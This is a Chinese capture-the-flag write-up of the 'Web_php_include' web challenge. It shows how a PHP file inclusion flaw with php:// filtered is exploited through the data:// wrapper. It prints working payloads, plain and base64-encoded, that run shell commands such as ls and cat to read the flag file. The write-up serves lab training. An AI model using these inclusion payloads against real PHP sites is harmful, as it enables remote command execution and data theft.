攻防世界-WEB-Web_php_include

打开靶机

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

payload如下:

html 复制代码
- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

html 复制代码
?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

拿到flag

相关推荐
zuowei288930 分钟前
华为网络设备配置文件备份与恢复(上传、下载、导出,导入)
开发语言·华为·php
xiaohe0741 分钟前
超详细 Python 爬虫指南
开发语言·爬虫·python
嗑嗑嗑瓜子的猫1 小时前
Java!它值得!
java·开发语言
xiaoshuaishuai81 小时前
C# GPU算力与管理
开发语言·windows·c#
lsx2024061 小时前
SVN 创建版本库
开发语言
xiaotao1311 小时前
01-编程基础与数学基石:Python错误与异常处理
开发语言·人工智能·python
皮卡蛋炒饭.2 小时前
线程的概念和控制
java·开发语言·jvm
John.Lewis2 小时前
Python小课(1)认识Python
开发语言·python
一只大袋鼠2 小时前
MyBatis 入门详细实战教程(一):从环境搭建到查询运行
java·开发语言·数据库·mysql·mybatis
sonnet-10293 小时前
函数式接口和方法引用
java·开发语言·笔记